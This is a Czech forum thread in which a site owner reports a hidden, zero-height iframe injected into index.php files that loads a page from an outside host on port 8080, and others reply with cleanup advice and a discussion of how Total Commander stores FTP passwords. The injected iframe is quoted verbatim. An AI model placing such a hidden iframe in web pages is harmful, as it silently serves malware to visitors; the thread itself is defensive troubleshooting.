Autor Zpráva
Etruska
Profil
Dobrý den,
na klientových stránkách se z ničeho nic objevil tento nežádoucí kód:
<iframe src="http://onniru.homelinux.org:8080/ts/in.cgi?open5" width=427 height=0 style="visibility: hidden"></iframe>
, což klientův antivir označil jako trojského koně. Tento kód se objevil na konci souboru index.php a to jak v kořenovém adresáři webu, tak i ve stejnojmenném souboru redakčního systému. Stalo se to přesně v den kdy jsem nainstaloval editor tinymce, může to být tím? Napadá vás nějaká jiná možnost, kudy se mohl ten kód na stránky dostat? Děkuji za odpověď
Joker
Profil
Máte na webu virus — co s tím?
jardax
Profil
1. Vymazat řádek ze souboru.

2. Přestat používat ftp klienta/TC a vymazat z nich hesla

3. Zmenit heslo na hostingu a pro ftp

4. Updatovat vsechny komponenty CMS (neni to Joomla?)

5. Nepouzivat komponenty CMS stahnute odkudkoliv:) napr. free verze placenych komponent z Rapidu :)
Chamurappi
Profil
Reaguji na jardaxe:
Špatné pořadí.
Radek9
Profil
jardax:
2. Přestat používat ftp klienta/TC a vymazat z nich hesla
Nebo používat nejnovější TC, který šifruje hesla :) A nechápu proč přestat používat TC. Když neuložíš hesla, tak je jako každý jiný klient.
Etruska
Profil
jardax
Řádek už jsem vymazal, ale změnu hesla provedu raději až budu mít 100% jistotu, že můj počítač je čistý. Používám svůj redakční systém, jediná cizí komponenta je už zmiňovaný editor tinymce.
Radek9
Zajímavé, to s tím šifrováním jsem nevěděl, hned si nový TC stáhnu.
Hitman
Profil
Radek9

Šifrovali se i staré verze TC...jenže ta ochrana nebyla nikdy nic moc. Mám verzi starou asi 2 měsíce a můj program mi během 1 vteřiny dokáže rozšifrovat 5 hesel. Pokud je něco novějšího, tak nevím

Raději bych doporučil neukládat hesla v Total Commanderu.
Radek9
Profil
Hitman:
Je to něco novějšího... Teď vlastně přesnš nevím jestli je to šifra nebo hash, ale zatím to ještě nikdo nerozšifroval, takže to vidím na ten hash. Navíc je to chráněno pomocí master password, takže už se o hesla nebojím.
nightfish
Profil
Teď vlastně přesnš nevím jestli je to šifra nebo hash, ale zatím to ještě nikdo nerozšifroval, takže to vidím na ten hash. Navíc je to chráněno pomocí master password, takže už se o hesla nebojím.
total commander verze 7.5 šifruje pomocí AES256, je to tedy šifra a ne hash (protože taky ty hesla potřebuje dešifrovat, aby se mohl připojit...)

takže pokud použijete TC 7.5 a zvolíte si netriviální master heslo, tak se nemusíte bát, že by vám nějaký pobuda z něj ukradl hesla k FTP (to že si je může odposlechnout po síti je už věc jiná...)

Vaše odpověď

Mohlo by se hodit

Příspěvky nesouvisející s webem budou odstraněny.

Prosím používejte diakritiku a interpunkci.

Ochrana proti spamu. Napište prosím číslo dvě-sta čtyřicet-sedm: